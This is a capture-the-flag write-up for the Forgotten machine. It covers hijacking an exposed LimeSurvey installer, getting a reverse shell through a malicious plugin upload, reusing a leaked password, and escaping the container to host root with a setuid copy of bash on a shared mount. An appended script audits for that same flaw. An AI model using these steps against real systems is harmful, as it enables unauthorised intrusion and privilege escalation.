
Machine (Easy) - Forgotten

Writeup for the Forgotten machine, an easy Linux box focused on exploiting a misconfigured LimeSurvey instance.

Writeup Author: BobBuilder


Objective: Gain remote code execution through LimeSurvey, escape the container, and escalate privileges to root on the host.

Category: Machine
Difficulty: Easy
Platform: Linux
Machine Author: xct


Enumeration

nmap -sV -p- <forgotten_ip>
  • 22/tcp – OpenSSH 8.9p1 (Ubuntu)
  • 80/tcp – Apache httpd 2.4.56 (Debian), shows 403 Forbidden

User

Web Enumeration

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt:FUZZ -u http://<forgotten_ip>/FUZZ -fw 1
  • Discovered paths: /survey/, /server-status/
  • /survey/ leads to LimeSurvey installer

LimeSurvey Installation

  • Navigated to:
    http://<forgotten_ip>/survey/index.php?r=installer/welcome
  • Set up a local MySQL database with required privileges
  • Used default LimeSurvey admin credentials:
    Username: admin  
    Password: <REDACTED>
    

Remote Code Execution

Used exploit:
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE

Steps:

  • Edited php-rev.php to set attacker IP
  • Built and uploaded malicious plugin zip
  • Activated it via LimeSurvey UI
  • Triggered reverse shell:
    http://<forgotten_ip>/survey/upload/plugins/Y1LD1R1M/php-rev.php
    

Enumeration with linPEAS

  • Discovered user: limesvc, part of the sudo group
  • Found hardcoded password:
    LIMESURVEY_PASS=***************
  • Verified sudo access:
    echo os.system('/bin/bash')
    sudo -S su
    (Used password to become root in container)
  • Containerized environment (no host flag)

SSH to Host

ssh limesvc@<forgotten_ip>
  • Same credentials work
  • Retrieved user flag from host system

Root

Container Breakout via SUID Bash

The container's web root (/var/www/html/survey) is the same directory as /opt/limesurvey on the host, so a root-owned setuid copy of bash placed there from inside the container is visible and executable from the host.

On container (as root):

cd /var/www/html/survey
cp /bin/bash bash
chmod +s bash

On host (as limesvc):

/opt/limesurvey/bash -p
  • Dropped into a root shell (-p keeps the effective uid instead of resetting it):
bash-5.1# id
uid=2000(limesvc) gid=2000(limesvc) euid=0(root) egid=0(root)
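As an added defender-side example that is not part of the writeup: a small POSIX shell audit that flags setuid/setgid files inside a directory a container shares with the host (the pattern abused above), plus a check for the nosuid mount option, under which the kernel ignores those bits. All function names, paths and sample files are constructed for the demo.

```shell
#!/bin/sh
# Added audit helper, not from the writeup; names and paths are constructed.
# Flags setid files in a host/container shared directory (the writeup's
# /var/www/html/survey -> /opt/limesurvey case) so they are caught early.

# Print each regular file below $1 carrying the setuid or setgid bit.
list_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Count those files (tr strips the padding some wc versions emit).
count_setid_files() {
    list_setid_files "$1" | wc -l | tr -d ' '
}

# Return 0 when the shared directory is clean, 1 when something needs attention.
# Suitable as a periodic host-side check over every bind-mounted path.
check_shared_dir() {
    n=$(count_setid_files "$1")
    if [ "$n" -eq 0 ]; then
        echo "OK: no setuid/setgid files under $1"
        return 0
    fi
    echo "ALERT: $n setuid/setgid file(s) under $1:"
    list_setid_files "$1" | while read -r f; do ls -ld "$f"; done
    return 1
}

# Succeed when a mount option string (field 4 of /proc/self/mounts) contains
# nosuid; on such a mount the kernel ignores setid bits, so "bash -p" gains nothing.
has_nosuid() {
    case ",$1," in
        *,nosuid,*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Build a throwaway directory mimicking the shared web root, drop in a fake
# setuid "bash" (a shell-script stand-in), and print the directory path.
make_demo_dir() {
    d=$(mktemp -d)
    mkdir -p "$d/upload/plugins"
    printf '<?php echo "plugin"; ?>\n' > "$d/upload/plugins/index.php"
    printf '#!/bin/sh\necho "stand-in for the copied bash"\n' > "$d/bash"
    chmod 4755 "$d/bash"     # setuid bit, as chmod +s did in the writeup
    printf '%s\n' "$d"
}

demo_dir=$(make_demo_dir)
check_shared_dir "$demo_dir" || true   # prints ALERT and the offending file
rm -rf "$demo_dir"
```

Mounting the shared volume with nosuid (and not running the LimeSurvey container as root) would have stopped the copied binary from yielding a root shell on the host.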